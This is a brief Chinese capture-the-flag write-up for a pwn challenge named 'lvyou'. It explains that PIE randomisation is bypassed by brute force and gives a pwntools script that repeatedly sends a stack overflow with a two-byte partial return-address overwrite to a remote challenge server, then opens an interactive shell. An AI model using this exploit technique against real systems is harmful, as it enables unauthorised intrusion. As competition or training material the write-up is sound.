lvyou——可以爆破的一个小pwn

很简单就溢出了,但是由于开启了pie所以函数的基址不确定,所以采用爆破

image-20230723215437204

1
2
3
4
5
6
7
8
9
10
from pwn import*
#p=process('./lvyou')
for i in range(500):
    p=remote("121.196.192.181",10001)
    #p = process('./lvyou')
    payload=b'a'*0x28+p8(0x9a)+p8(0x52)
    p.recvuntil(b'choice :\n')
    p.sendline(b'1')
    p.send(payload)
    p.interactive()